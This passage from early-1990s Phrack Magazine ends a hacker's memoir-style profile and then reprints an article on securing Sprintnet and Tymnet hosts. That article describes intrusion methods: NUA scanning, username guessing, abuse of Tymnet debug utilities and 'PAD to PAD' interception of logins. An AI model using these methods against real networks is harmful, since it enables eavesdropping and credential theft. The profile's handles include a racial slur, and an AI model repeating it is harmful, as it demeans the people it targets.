  1603. and ultimately ended up with 3 of 'em, one of which still works (like wow).
  1604. This led to the first generation of Phantom Access programs which started to
  1605. seep into the moDeM WeRlD around 1983, with the final revisions being let loose
  1606. in 1987 or 1988, under the auspices of Dead Lord.  By this time I had long
  1607. since stopped working on them and had relatively little to do with their forms
  1608. of release.
  1609.  
  1610.      Over the years I've been in a seemingly-endless succession of groups and
  1611. gatherings under nearly 50 different pseudonyms which were frequently invented
  1612. and dropped, all around that one specific timeslice and reference-point.  There
  1613. were only two that I was ever "serious" about, which is to say I entered into
  1614. them honestly believing the ideals and reasons for the group's inception, to be
  1615. valid and worth upholding and being a part of.  In other words I was in my
  1616. mid-teens and my attitude wasn't one of "Yeah yeah, take 10; a buncha dudes are
  1617. gonna screw around, some of it will be fun, some of it will be silly, and a lot
  1618. of it will be bitchy and cranky, but hey, I'm only here to amuse myself, so
  1619. what the fuck . . ."  The two "serious" affiliations were Apple Mafia and the
  1620. Knights of Shadow.  KOS ceased to exist in mid-1984 and I dropped out of the AM
  1621. around 1985, although to my knowledge it kept going until '86 or '87 when the
  1622. last surviving members found better things to do with their time.  In 1987 I
  1623. was also "OfFphICiALlLY" inducted into the Fraternal Order of the Legion of
  1624. Doom, which was just gosh w0wz0.  Actually, it's much more fun in retrospect,
  1625. since most of us are pretty good friends at this point in time, which seemed an
  1626. unlikely event back in the early 80's <giGgLE!!@#>
  1627.  
  1628.      I ceased to be "active" sometime around 1985, having gained legal access
  1629. to almost anything I could possibly want to play with, as well as having made
  1630. friends with people working for NYNEX who de-mystified many things for me.  The
  1631. ultimate conclusion to all of this was that having THE POWER is cool -- and
  1632. using it to annoy people was absolutely hilarious -- but only led to two
  1633. possible destinations.
  1634.  
  1635.      You use it all as a learning experience and "grow up" realizing that
  1636. you're playing cops and robbers, and many of the things you have spent years
  1637. doing are now illegal and liable to get you into a lot of trouble.  You can't
  1638. go back in time (at least not yet).
  1639.  
  1640.      You could keep doing stupid things and end up in a legal dilemma over
  1641. something that isn't very important.  Because . . . it really isn't "THE
  1642. POWER," it's just a very limited form of "it" embodied by a phone system and
  1643. some computers.  And when you compare that to a piece of art, or a collection
  1644. of music, or a new series of programs that someone has created, you begin to
  1645. realize that all you're doing is fucking with things that other people made,
  1646. and you're wasting your time abusing . . .
  1647.  
  1648.      To cut short my rant, I have no moral judgements to pass upon anyone or
  1649. anything, because whatever it is that people do, it's some sort of learning
  1650. process leading towards their destination (whether they realize it or not).
  1651. The computer underground is just not a place where you can remain "active"
  1652. beyond a certain period of time that serves as a sort of "rite of passage"
  1653. towards that something else.  To hang around indefinitely and remain "active"
  1654. is to become a criminal.
  1655.  
  1656.      Almost everything I've done has taken place with a handful of friends who
  1657. played various roles in events that transpired -- primary among them Dead Lord
  1658. (Bruce Fancher), one of my closest friends for the better part of a decade, as
  1659. well as The Unspeakable One whose name cannot be mentioned for to do so causes
  1660. rifts within space/time, and a buncha dudes from NYC/NJ who for the most part
  1661. want to blip their personas off the face of Cyberspace and get on with their
  1662. lives without the specter of LaW EnForCEmEnT hanging over them for doing silly
  1663. things as teenagers.
  1664.  
  1665.      In 1986 I ceased calling anything and didn't access a computer that was
  1666. hooked into a modem until late 1990.  As of late 1992, I have been "retired"
  1667. for a little over 7 years.
  1668.  
  1669.  
  1670. Patrick's Favorite Things
  1671. ~~~~~~~~~~~~~~~~~~~~~~~~~
  1672.       Women:  Delia!  Gorgeous, Intelligent, Wonderful, & able to deal with me.
  1673.         Men:  Bwooooce.
  1674.        Cars:  928s4, Hyundai, Edsel.
  1675.       Foods:  Italian, red meat, SuPeR Hi PER Pr0tE!n, anything with SPAM.
  1676.       Music:  Any band with the word "LORD" in it (Lords of the New Church,
  1677.               House of Lords, Lords of Acid, Lords of Chaos, Traci Lords).
  1678.     Authors:  Michael Moorcock, Sun Tzu, Machiavelli, Hans Horbiger, Dr. Seuss.
  1679.       Books:  Play of Consciousness, The Book of PAT.
  1680.  Performers:  Bill the Cat, Sting, Perry Farrell, GuNz N RoSeZ, plus anybody
  1681.               who has sold out to the mahnnnnnn fo' $$$$$$$ in a biiiiiig way.
  1682.  
  1683.  
  1684. Most Memorable Experiences
  1685. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  1686.      Most memorable things are unmentionable and destined to stay that way for
  1687. a while.  Those who played the games know the stories; those who didn't
  1688. eventually will -- but like, who cares.  Everybody should live their own
  1689. stories, life's an interesting game . . . go play.
  1690.  
  1691.  
  1692. Some People to Mention
  1693. ~~~~~~~~~~~~~~~~~~~~~~
  1694. Dead Lord         - The one who is not and can never be, yet exists.  Solely an
  1695.                     infinite layering of the possibilities inherent within
  1696.                     personal transmigration and biotechnology?  Or alive, with
  1697.                     flesh, blood, bone and an adornment of k0dEz & warEZ?  You
  1698.                     must not be blinded by sight, nor fooled by what things
  1699.                     appear to be when they are not, for what is a man when he
  1700.                     has not the latest, nor possesses the abilities to acquire
  1701.                     same?  This is a question perhaps best left to the wise men
  1702.                     who roam the meadows of the ozone, forever catching the
  1703.                     edge and surfing the waves cresting upon the seas of
  1704.                     thought and what is, was, and shall always be.
  1705.  
  1706. The               - I know who you are, so tell me who I am, and let's just
  1707.    Unspeakable      get on with it okay?  Because otherwise, TV is likely to
  1708.               One   drop the entire facility dead.  Anyone of normal caliber
  1709.                     can see that to be entirely obvious to thee of the id'ness
  1710.                     of pole-cats watching Star Wars.  8+ KlUb ElYtE.
  1711.  
  1712. Terminus          - A good friend over many years who, as most people know, has
  1713.                     recently gone through a lot.  The future looks bright, and
  1714.                     I look forward to looking back on all this with you in
  1715.                     another ten years.  [Look, look, looking] (haga!)
  1716.  
  1717. Magnetic Surfer   - Neato guy who knew me way-back-when, and used to give me
  1718.                     gNu Apple wArEz on cassette tape which he had downloaded at
  1719.                     the lightning speed of 300 baud.  Also provided a means to
  1720.                     meeting many of my friends, via Sherwood Forest, when it
  1721.                     first existed and hosted Inner Circle and later KOS.
  1722.  
  1723. The Phantom      - See above, also gave me a full set of TAP copies in 1983,
  1724.                    which I never returned to him.
  1725.  
  1726. The Plague        - A cool guy, close friend before his fatal accident when
  1727.                     the truck went off the road near Poker Flats, just 5 miles
  1728.                     north of Pig's Knuckle, ID.  Tragic, hope he's happy in
  1729.                     his new home, far, far underground, running the world's
  1730.                     first afterlife/subterranean BBS.
  1731.  
  1732. ApPul HeyD! \       The elYtE peARz of Scepter/InterCHAT who went on to form
  1733. SuperNigger  >    - DPAK, an entity SO ELITE that it required FOUR letters for
  1734. Sharp Rem0b /       its acronym & brought the world Lex Luthor on HBO!
  1735.  
  1736. SuperNigger       - Because he is 2 elyTe to be encompassed in merely one
  1737.                     line and requires at least two.
  1738.  
  1739. Lord_foul         - Ahhhh do0d....  Well we all have our roles 2 play.  Catch
  1740.                     ya in tha outback.  (cha mod pla foul sl=999 mi=99,mh=99)
  1741.  
  1742. Ninja NYC         - One of the few people I have ever met who seems to have
  1743.                     mastered the art of being happy wherever he is, doing
  1744.                     whatever he happens to be doing.  An exceptionally nice
  1745.                     human being.
  1746.  
  1747. Elven Wizard  \     A collection of compatriots, cohorts, and all around dudEz
  1748. The Infiltrator\    with whom I had an inordinate amount of fun, first ro0l!ng
  1749. The Gunslinger  > - the WhEReZ world, then changing our handles (well except
  1750. The Bishop     /    for Jeff) & dismantling eliteness and its tarnished allure,
  1751. The Gonif     /     along with its cadre of false prophets (namely ourselves
  1752.                     under half a dozen other handles).
  1753.  
  1754. Andrew \            "I doan' wannnnnnnnnt any money, I want to be left alone,
  1755. Chase   >         - tell them to go 'way."  May Sutekh look upon our worldly
  1756. Asif   /            endeavors and bless us all, everyone.  !nse<t01dZ ro()l!!@
  1757.  
  1758. Paul Muad'Dib     - A lotta fun, although he never did have any new wares
  1759.                     (unless you count source code).  In any case, I guess it's
  1760.                     not too relative any more.
  1761.  
  1762. Tuc               - I think it's a requirement to mention Scott; far be it from
  1763.                     me to break with tradition.  Hi Tuc!  Thanks for the ride!
  1764.  
  1765. Captain Avatar    - He had 'em Ahllll!  ALL of them... MORE THAN all of 'em....
  1766.  
  1767. Napoleon Bonaparte- Nappy ran Securityland.  I called it, it was cool.  It made
  1768.                     me smile.  I guess it made the FBI smile too.
  1769.  
  1770. Mr. Xerox         - Mike was usually witty, sarcastic, annoying, egotistical,
  1771.                     obnoxious, and almost always late.  We got along great
  1772.                     and I really miss the guy sometimes.  Hullo Mike, wherever
  1773.                     you may roam.
  1774.  
  1775. Taran King        - BesideZ DeYd L0rD & Sn, the El1teZt Pers0[\] eYe EveR meT!
  1776.                     StaY sP!fpHY [>o()d!
  1777.  
  1778. Phantom Phreaker  - Here's to shifting focus and finding something far more
  1779.                     interesting to play with than phones & computers 8-).  It's
  1780.                     an amazing universe, huh . . .
  1781.  
  1782. Lex Luthor        - After a ten year period during which we typed to each other
  1783.                     once in a while and seemed situated at antipodean sides of
  1784.                     the m0dUm Yo0n!veRsE, I finally met with Lex in the very
  1785.                     near past.  It's shocking to find that he's actually one of
  1786.                     the most gracious, funny, and pleasant guys I've ever had
  1787.                     an opportunity to meet.  Best wishes in whatever you may
  1788.                     end up doing!
  1789.  
  1790. Erik Bloodaxe     - A keg of Sandoz, a Vat of pig's blood, T&C and thee.
  1791.  
  1792. Sigmund!@31!@!!!  - As the UFOs said, they know who you are, they know where
  1793.                     you are.  Seriously, hey, it was entertaining.  Good luck
  1794.                     man.
  1795.  
  1796.  
  1797. unReAl PeOpUL 2 MenShun
  1798. ~~~~~~~~~~~~~~~~~~~~~~~
  1799. StJude  -  For everything.  It's good to know you . . . love, light, and a
  1800.            lotta deep-fried giri with ciphers thrown in.
  1801.  
  1802. Siva    -  Look, polygons or voxels, Gibsonian or Post-modern, by Risc or by
  1803.            Cisc with Objective C++ running Smalltalk under Windows NT over the
  1804.            underpass and around the bend; it's gonna happen, and we're gonna be
  1805.            there having a party.  Smile, as I think you've mentioned on more
  1806.            than one occasion; it's an interesting time to be alive 8-).
  1807.  
  1808. Bruce   -  Quite possibly the coolest grown-up I have ever met 8-).  Which is
  1809. Sterling   saying a lot.  The world would be a much better place if Bruce
  1810.            could be cloned and then placed inside a tornado, hooked into a
  1811.            net, fitted with an adamantium exoskeleton, and then dropped into
  1812.            the de-criminalized zone with a BigMac and a holographic tape
  1813.            recorder.
  1814.  
  1815. Jim     -  Hey so, are you doing more things at once or am I?  I bet I can
  1816. Thomas     watch TV, listen to music, have three phone conversations, and
  1817.            write an article with 25% greater coherence than Chuck has while
  1818.            eating and watching TV.  On the other hand, writing two books,
  1819.            teaching, reading, running CUD, having a life, and still finding
  1820.            time to hang out are at least level 15 -- haven't hit that yet,
  1821.            but I'm working on it!
  1822.  
  1823. Andy    -  Hey man.  I enjoy what you're doing, keep the faith, ignore the
  1824. Hawks      assholes, take inspiration from the inspired, and retain belief
  1825.            in your dreams.  Oh okay, gotta go, time to sell out, ignore what I
  1826.            just said 8-).
  1827.  
  1828. 3Jane   -  Models/actresses/sex cadets united for a better tomorrow, under
  1829.            Unix with named_pipes and justice for some of us.
  1830.  
  1831.  
  1832. Memorable Phreak/Hack BBSes
  1833. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1834. 8BBS - Long ago, I didn't understand it, or what I was typing, but it was fun.
  1835. MOM - Long ago, although by now I did understand it and had slightly less fun.
  1836. Pirate's Harbor - Before Norman figured out he could make a killing on TIMECOR.
  1837. Pirate's Chest - 6 line 80 meg board circa 1983.  Totally Cool.
  1838. Adventurer's Tavern - Last bastion of tremendous on-line fun & anarchy.  RIP.
  1839. Securityland - Nappy's Board.
  1840. Pirate's Phunhouse -> Cat's Cavern - The Tempest's system(s).
  1841. Dark Side of the Moon - Through many long and strange phases.  Still running.
  1842. RACS III - w()wZ0 blargel blumpfk0l SwillY sw()nk!@!#!@!!!!!
  1843. OSUNY (3 cycles) - Some more fun than others.
  1844. Sherwood Forest I, II, III - Liked all three, although 1 was the coolest.
  1845. Plovernet - Two phases.  Both great.
  1846. The (urse - WarEZ do()d & eLIteNEsS Galore!@#!@#!@#!@#
  1847. LOD - The Start in 1984, and intermittently thereafter.
  1848. COPS - Cool Florida board.
  1849. Shadowland - Cool Colorado board.
  1850. SpecELITE - So overwhelmingly awful, that it was wonderfully fun.
  1851. WOPR - Lotta fun for a while, then he threw everyone off & went 1200only wareZ.
  1852. Pirate-80 - It was very effervescent with a touch of jello.
  1853. Everything Sir Knight ever ran - Too many names (Tele-Apa, HackNet, NewsNet...)
  1854. World of Cryton - WOC!  JAMES!  ELITENESS!
  1855. The Safehouse - Apple Bandit's.  Hey, I want my Diskfer ][ dude!
  1856. Farmers of Doom - Blo0p.
  1857. Pirates of Puget Sound - Nice softwareZ.  Lotta fun.
  1858.  
  1859.  
  1860. A few things Lord Digital would like to say:
  1861. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1862. BELIEVE EVERYTHING THAT YOU HEAR.  KNOW EVERYTHING YOU SEE. UNDERSTAND
  1863. EVERYTHING YOU DO NOT COMPREHEND.  BE AT ONE WITH THE STILLNESS OF THE
  1864. REVOLVING HAMSTER WHEEL AND FLOSS BETWEEN MEALS.
  1865.  
  1866. As far as the future of the hack/phreak world and telecommunications in general
  1867. is concerned, the PhrAck World is absolutely spiffy and I believe that ISDN
  1868. will change EVERYTHING and make it rounder, taller, bigger, more stable, and
  1869. also give later generations something to look back upon and sneer at with
  1870. contempt.
  1871.  
  1872.  
  1873.  
  1874.  
  1875. Date:     Tue Mar 23, 1993  5:51 pm  PST
  1876. From:     phrack
  1877.           EMS: INTERNET / MCI ID: 376-5414
  1878.           MBX: phrack@stormking.com
  1879.  
  1880. TO:       Mitchell K. Hobish / MCI ID: 116-6178
  1881. TO:       Anthony Weiner / MCI ID: 300-6908
  1882. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  1883. TO:       Andrew Koran / MCI ID: 396-7939
  1884. TO:       Pascal Lointier / MCI ID: 504-4319
  1885. TO:     * Berton Corson / MCI ID: 528-0397
  1886. TO:       Jeff Ubois / MCI ID: 554-3399
  1887. TO:       Multiple recipients of list
  1888.           EMS: INTERNET / MCI ID: 376-5414
  1889.           MBX: phrack@stormking.com
  1890. Subject:  Phrack 42/4-14
  1891.  
  1892.                          ==Phrack Magazine==
  1893.  
  1894.              Volume Four, Issue Forty-Two, File 4 of 14
  1895.  
  1896.                           Prelude to a Kiss
  1897.  
  1898.     - Lessons Unlearned Are Doomed To Bring Misery Ad-Infinitum -
  1899.  
  1900.  
  1901. The following is an article I wrote for a mainstream computer security
  1902. periodical called ISPNews.  At the time, I had been discussing the idea
  1903. of a bi-monthly column with the editor at that time, Len Spitz. (Now the
  1904. editor is Michael Alexander, ex-of Computerworld)
  1905.  
  1906. The following article, although very, very tame by my standards, and
  1907. admittedly lacking in enough hardcore information to help security
  1908. professionals to apply a quick fix to their many problems, caused quite
  1909. a stir among the folks at ISPNews.
  1910.  
  1911. Since this article was from me, a self-proclaimed hacker, it
  1912. underwent an extraordinary amount of scrutiny.  Rather than be
  1913. accepted or denied by the editor, my article got the dubious honor of
  1914. being sent before an editorial advisory board.  I checked every back
  1915. issue of ISPNews and could find no mention of such an entity until the
  1916. November/December 1991 issue, the issue immediately following an length
  1917. interview with none other than myself.
  1918.  
  1919. When I questioned Len Spitz about this rather odd fact, he maintained
  1920. that this committee had indeed existed, but stammered his way through my
  1921. question to name any other article that they had convened to judge in
  1922. the past, and to explain the duties of such a group.  He could not give
  1923. me any answers.
  1924.  
  1925. The group itself was obviously geared to be a type of kangaroo-court.
  1926. It consisted of:
  1927.  
  1928. William J. Cook -- The man who less than two years prior had ordered my
  1929.                    privacy and civil rights violated by the Secret
  1930.                    Service solely on the basis of two bulletin board
  1931.                    posts and my association with members of the Legion
  1932.                    of Doom and the Phrack Magazine staff.
  1933.  
  1934. William H. Murray -- A senior consultant with Deloitte & Touche who had
  1935.                      two weeks prior stood up before my presentation to
  1936.                      the MIS Training Institute's 11th Annual Conference
  1937.                      and said loudly "I can't take this any more, I'm leaving,"
  1938.                      to the astounded audience.  The man who went on to
  1939.                      state in his own column in ISPNews, "Can we lie
  1940.                      down with dogs and get up without fleas?"  and "Ask
  1941.                      yourself if you wish to work in a profession
  1942.                      populated by rogues.  Ask yourself if you want your
  1943.                      reputation mixed with theirs."
  1944.  
  1945. Winn Schwartau -- A security consultant with a broad view and an open
  1946.                   mind, undoubtedly resulting from his background in the
  1947.                   music industry, as opposed to the bean-counting world
  1948.                   of MIS.
  1949.  
  1950. David J. Stang -- Director of research, NCSA.  Noted virus specialist.
  1951.  
  1952. This was the group.  Here is what they said about my article:
  1953.  
  1954. Bill Cook --  "It's very well-written and informative, but shouldn't be
  1955. published for legal reasons."  (What those reasons might have been were
  1956. not stated, nor did Mr. Cook return my call to his office.)
  1957.  
  1958. Bill Murray -- Was not even given the file to read, as his response was
  1959. deemed to predictable.
  1960.  
  1961. Winn Schwartau -- "Publish it.  This is valuable information."
  1962.  
  1963. David Stang -- Was not given the file because, according to Len Spitz
  1964. "David is just a virus expert, and this isn't in his arena, so we gave
  1965. it to Ray Kaplan."
  1966.  
  1967.     Ray Kaplan -- Did not want to comment on it because he said, "It's
  1968.     not my expertise, so I gave it to a friend."  I believe Ray did not
  1969.     want to get involved with anything having to do with hackers after
  1970.     the reactionary attitudes of the DECUS attendees towards his defense
  1971.     of Kevin Mitnik that nearly left him in bankruptcy.  I cannot blame
  1972.     him at all.  (Hell, I like the guy...he's certainly more brazen with
  1973.     attitude these days, I mean, he went to HoHoCon for God's-sake!)
  1974.  
  1975.       Ray's Friend -- "This is of absolutely no use to the information
  1976.       security professional, but of great use to the hacker community."
  1977.       I still do not know who Ray's "friend" was.  I hope his
  1978.       Alzeheimer's has subsided since this comment.
  1979.  
  1980. Needless to say, the article went unpublished.
  1981.  
  1982. Shortly thereafter I received a letter from Robert Fox, an assistant
  1983. vice-president at Sprint.  Somehow my little article had snaked its
  1984. way over to Kansas City.  It's amazing how one faxed copy of an article
  1985. could have reached so many people in such a short period of time.
  1986. Mr. Fox had the following to say:
  1987.  
  1988. ------------------------------------------------------------------------
  1989.  
  1990. United Telecom/US Sprint
  1991. 9221 Ward Parkway
  1992. Kansas City, Missouri 64114
  1993. 816-822-6262
  1994.  
  1995. Robert F. Fox                                     January 13, 1992
  1996. Assistant Vice President
  1997. Corporate Security
  1998.  
  1999.  
  2000. VIA AIRBORNE EXPRESS
  2001.  
  2002. Mr. Chris Goggans
  2003. COMSEC
  2004. Suite 1470
  2005. 7322 Southwest Freeway
  2006. Houston, TX 77074
  2007.  
  2008.     Re:  Your Article "Packet-switched Networks
  2009.           Security Begins With Configuration"
  2010.  
  2011. Dear Mr. Goggans:
  2012.  
  2013.     A copy of the referenced unpublished article, which is
  2014. enclosed with this letter, has come to our attention.  After
  2015. review, we believe the article is inaccurate and libelous.  If
  2016. published the contents of the article could cause damage to Sprint
  2017. customers, Sprint and our reputation, and we request that you not
  2018. publish or otherwise disseminate it.
  2019.  
  2020.      In addition, we believe some of the information contained in
  2021. the article has been obtained through violation of the property
  2022. rights of Sprint and/or our customers and we demand that you cease
  2023. any efforts or attempts to violate or otherwise compromise our
  2024. property whether or not for you personal financial gain.
  2025.  
  2026.                         Sincerely,
  2027.  
  2028.                         Robert F. Fox
  2029.  
  2030.  
  2031. Enclosure
  2032.  
  2033.  
  2034. ------------------------------------------------------------------------
  2035.  
  2036.  
  2037. Regardless of how Mr. Fox came into possession of this article, i have to
  2038. question his letter based on his comments.   First he states that
  2039. the information is almost criminally incorrect and could cause harm to
  2040. Sprint's reputation.  Then he states that information in the article has
  2041. come to be known through the violation of the security of Sprintnet and/or
  2042. clients of Sprintnet.  In effect, I am both a thief and a liar according
  2043. to Mr. Fox.  Well, if I were a thief the information could not possibly
  2044. be inaccurate if it were obtained from Sprintnet or its clients.  If I
  2045. was a liar, why would they think the information came from themselves
  2046. and/or their clients?  Mr. Fox's thinly veiled threat caused me great
  2047. amusement.
  2048.  
  2049. I then decided no mainstream publication would touch this article.  I
  2050. don't know why everyone is so scared of the truth.  Perhaps if the truth
  2051. were known people would have to work, and perhaps if the truth were
  2052. known some people would be out of work.  None of this is of concern to
  2053. me anymore.  I am here to speak the truth and to provide uncensored
  2054. information gathered from a variety of sources to provide readers of
  2055. this magazine the facts they need to quench their thirst for knowledge.
  2056.  
  2057. This article is included as a prelude to a series of articles all based
  2058. on packet switched networks as related to information merely alluded to
  2059. in my harmless little article.  To our readers, "enjoy."  To the cowering
  2060. so-called security experts, "kiss my ass."
  2061.  
  2062. ------------------------------------------------------------------------
  2063.  
  2064. Packet-switched Networks
  2065.  
  2066. Security Begins with Configuration
  2067.  
  2068.  
  2069. For many companies the use of packet-switched networks has
  2070. allowed for increased interconnectivity of systems and easy
  2071. remote access.  Connection to a major public packet-switched
  2072. network brings increased access points with local dialups in
  2073. many cities around the nation as well as access
  2074. points from foreign countries.
  2075.  
  2076. With the many obvious benefits provided by this service,
  2077. improper configuration of either the host's connection to the
  2078. network or of the network itself can lead to extreme security
  2079. problems.
  2080.  
  2081. The very connection to a public packet-switched network
  2082. immediately increases the exposure of that particular system.
  2083. America's two major commercial networks, BT-Tymnet and
  2084. Sprintnet, are probably the most popular US targets for hackers
  2085. around the world.  The wealth of systems available on
  2086. these two networks has provided hackers with a seemly endless
  2087. supply of sites on which to sharpen their skills.  The ease of use
  2088. inherent in both networks makes them popular for legitimate
  2089. users as well as illegitimate users.
  2090.  
  2091. The Telenet software utilized in the Sprintnet network allows
  2092. users to enter a network user address (NUA) in the standard
  2093. format as outlined in the X.121 numbering standard:
  2094.  
  2095. DDDDAAAHHHHHPP
  2096.  
  2097. Where D = the four digit data network identifier code (DNIC)
  2098.       A = the three digit area code corresponding to the host
  2099.       H = the host address
  2100.       P = the port or (sub) address
  2101.  
  2102. On domestic calls the DNIC for Sprintnet (3110) is stored in
  2103. all Sprintnet equipment and is used as the default.  By
  2104. merely picking an area code, most often corresponding to the standard
  2105. area codes of the North American Numbering Plan, and an
  2106. additional one to five digits a would-be intruder can
  2107. connect to any number of systems while looking for targets.
  2108.  
  2109. In the past many software packages have been written to
  2110. automate this process, and large scans of the network have
  2111. been published in a variety of underground media.
  2112.  
  2113. The Tymnet II software utilized in BT's Tymnet
  2114. prompts the user for a mnemonic which corresponds to a host
  2115. or number of hosts.  The mnemonic, or username, is referenced
  2116. to a fixed host address in the network's Master User
  2117. Directory (MUD).  This username may allow the caller to
  2118. connect to a variety of sites, as opposed to merely one, by
  2119. entering additional information in separate fields after the username.
  2120. It may also correspond to a network gateway thereby allowing
  2121. the user to enter a number in the X.121 format and connect to that
  2122. specific site.
  2123.  
  2124. This particular network, with its primary use of words as
  2125. opposed to numbers, has been compromised by intruders who
  2126. guess common words or names in their attempts to connect to
  2127. remote sites.
  2128.  
  2129. Each network has its own particular set of problems but
  2130. solutions to these problems are both simple and quick in
  2131. implementation.
  2132.  
  2133. SPRINTNET
  2134.  
  2135. The first deterrence in securing a host on this
  2136. network is to restrict access to the site.  This can be
  2137. accomplished in a number of ways.  The most obvious is to
  2138. have the site refuse collect calls.  All calls on Sprintnet
  2139. are reverse-billed, unless the site has specifically asked
  2140. that they not be billed for incoming calls.  This makes the
  2141. site accessible only through the use of a Network User
  2142. Identifier (NUI).
  2143.  
  2144. Another method of restricting access from intruders is to
  2145. place the host in a closed user group (CUG).  By electing to
  2146. have the host in a CUG, the administrator can allow only
  2147. certain NUIs to connect, and can also restrict the actual
  2148. addresses from which access is allowed.  For example:  A site
  2149. is placed in a CUG that will allow only calls from the
  2150. company's remote branch in Dallas to access the host and only
  2151. with the NUI created specifically for that branch.  All
  2152. attempts to access the site from an address outside the 214
  2153. area will result in an error message indicating an invalid
  2154. source address.  All attempts to connect with an invalid NUI
  2155. will result in an error indicating an invalid ID.  This
  2156. information is maintained in the networks main TAMS (TP
  2157. Access Management System) database, and is not subject to
  2158. manipulation under normal circumstances.
  2159.  
  2160. Many sites on the Sprintnet network have specific
  2161. subaddresses connecting to a debug port.  This is usually at
  2162. subaddress 99.  All connections to debug ports should be
  2163. restricted.  Allowing users access to this port will allow
  2164. them the ability to load and display memory registers of the
  2165. Sprintnet equipment connected to the port, and even reset
  2166. as well as enable or disable the host.  Most debug ports are
  2167. equipped with preset passwords from the vendor, but should be
  2168. changed.  These ports should also restrict connection from
  2169. all addresses except those specified by the company.
  2170.  
  2171. An additional measure that may foil intruders relying on
  2172. software programs to find all addresses in a given area code
  2173. is to request that the host be given an address above 10000.
  2174. The time involved in scanning the network is extensive and
  2175. most casual intruders will not look past the 10000 range.  In
  2176. fact, many will not venture past 2000.
  2177.  
  2178. BT-TYMNET
  2179.  
  2180. Any company having a host on the Tymnet network should choose
  2181. a username that is not easily associated with the company or
  2182. one that is not a common word or name.  If an intruder is aware that
  2183. XYZ Inc. has a UNIX based system on TYMNET he or she would
  2184. begin attempts to find this system with the obvious
  2185. usernames:  XYZ, XYZINC, XYZNET, XYZ1, XYZUNIX, UNIX, etc.
  2186.  
  2187. BT-Tymnet allows for these usernames to have additional
  2188. password security as well.  All hosts should have this option
  2189. enabled, and passwords should be changed frequently.
  2190. The password should always be a minimum of six
  2191. digits, should include letters, numbers and at least one symbol
  2192. character, and should not be associated in any way with the
  2193. corresponding username.
  2194.  
  2195. Many clients of BT-Tymnet have purchased the Tymnet II
  2196. software and have individual sub-networks that are linked to
  2197. the public network through gateways.  Each subnet is
  2198. personally configured and maintained through the use of a
  2199. package of utilities provided by Tymnet.  These utilities
  2200. each perform a specific task and are highly important to the
  2201. smooth operation of the network.  These utilities may be
  2202. accessed either directly from the host-end or remotely
  2203. through the network by entering a corresponding username.
  2204. Some of these utilities are:
  2205.  
  2206. XRAY : a monitoring utility
  2207. DDT : a debugging utility
  2208. NETVAL : a database of username to host correspondence
  2209. PROBE : a monitoring utility
  2210. TMCS : a monitoring utility
  2211.  
  2212. Under NO CIRCUMSTANCES should these utilities be left
  2213. without a password on the company's subnet.  These utilities should
  2214. also never be named similarly to their given name.  Should an
  2215. intruder gain access to any of these utilities the integrity
  2216. of your network will be at risk.
  2217.  
  2218. For example:
  2219.  
  2220. Allowing an outsider access to the XRAY utility, would give
  2221. he or she the ability to monitor both incoming and outgoing
  2222. data from the host using the "TA" command (display trace data
  2223. table in ASCII).  Use of certain XRAY commands are restricted
  2224. by a security function that allows only certain usernames to
  2225. execute commands on the basis of their existence in a
  2226. "Goodguy" list, which can be displayed by any XRAY user.
  2227. Should a user be of the highest privilege, (2), he or she can
  2228. add or delete from the "Goodguy" list, reset connections, and
  2229. display trace data on channels other than the default
  2230. channel.
  2231.  
  2232. Allowing a user access to DDT can result in complete
  2233. disruption of the network.  DDT allows the user the ability
  2234. to write directly to the network controller "node code" and
  2235. alter its configuration.
  2236.  
  2237. Allowing a user access to NETVAL will allow the user to
  2238. display all usernames active on the network and the
  2239. corresponding host addresses.
  2240.  
  2241. OTHER PROBLEMS
  2242.  
  2243. EXAMPLE ONE
  2244.  
  2245. On many networks users have the ability to connect to the
  2246. packet assembler/disassembler (PAD) of the network dial-ups.
  2247. This has led to significant problems in the past.
  2248.  
  2249. In the mid-1980's two American hackers were exploring the
  2250. German packet network DATEX-P.  One connected to a host in
  2251. Berlin and was immediately disconnected by the remote site.
  2252. Before the hacker could react, the German host connected to
  2253. the NUA corresponding to his Sprintnet PAD and sent him a
  2254. login prompt.  This alarmed the hacker greatly, as he assumed
  2255. that the proprietors of the German host had somehow noticed
  2256. his attempt to access their system.  He contacted his partner
  2257. and told him of the occurrence.  The two concluded that since
  2258. the NUA of the origination point is sent in the packet-header,
  2259. the remote site must have been programed to recognize the NUA and
  2260. then return the call.  The fact that it had returned a call to a
  2261. public PAD was intriguing to the pair, so they decided to
  2262. attempt to recreate the event by calling each other.  Both
  2263. individuals connected to the network and one entered the NUA
  2264. corresponding to the others PAD.  A connection resulted and
  2265. the two were able to interact with one another.  They then
  2266. decided that they would periodically meet in this fashion and
  2267. discuss their findings from Germany.  At the time of the next
  2268. meeting, the connection did not occur as planned.  One hacker
  2269. quickly received a telephone call from the second who
  2270. exclaimed rather excitedly that he had attempted to connect
  2271. to his partner as planned, but accidentally connected to
  2272. another PAD and intercepted a legitimate user typing his NUI.
  2273. Further investigation proved that one could connect to public
  2274. PADs during the idle period when the user was in network
  2275. mode, prior to making a connection to a remote site.  This
  2276. discovery was intended to remain secret, because of its
  2277. extremely dangerous applications.  Nevertheless, word of this
  2278. discovery soon reached the entire hacker community and what
  2279. came to be known as "PAD to PAD" was born.
  2280.  
  2281. The "PAD to PAD" technique became so wide-spread that hackers
  2282. were soon writing software to intercept data and emulate
  2283. hosts and capture login names and passwords from unsuspecting
  2284. network users.  Hackers were intercepting thousands of calls
  2285. every day from users connecting to systems ranging from
  2286. banking and credit to the Fortune 500 to government sites.
  2287.  
  2288. After nearly two years of "PAD to PAD" Sprintnet became
  2289. alerted to the crisis and disallowed all connections to
  2290. public PADs.  When Sprintnet expanded its service overseas
  2291. they once again left access to the overseas PADs
  2292. unrestricted.  The problem went unnoticed again until
  2293. their attention was brought to it by a hacker who called
  2294. Sprintnet security and told them that they ought to fix it
  2295. quickly before it became as wide-spread as before.
  2296. The problem was resolved much quicker this time.
  2297.  
  2298. This particular technique was not limited to Sprintnet.  All
  2299. networks using the Telenet software are at risk to this type
  2300. of manipulation.  This type of network manipulation was
  2301. integral in the recent compromise of a large Bell Company's packet
  2302. network in a much-publicized case.  Certain foreign
  2303. networks in countries such as Israel, England, Chile, Panama,
  2304. Peru and Brazil are also at risk.
  2305.  
  2306. EXAMPLE TWO
  2307.  
  2308. In the late 1980's hackers stumbled onto a packet network
  2309. owned and maintained by a large facilities maintenance
  2310. company.  This particular network had a huge flaw in its
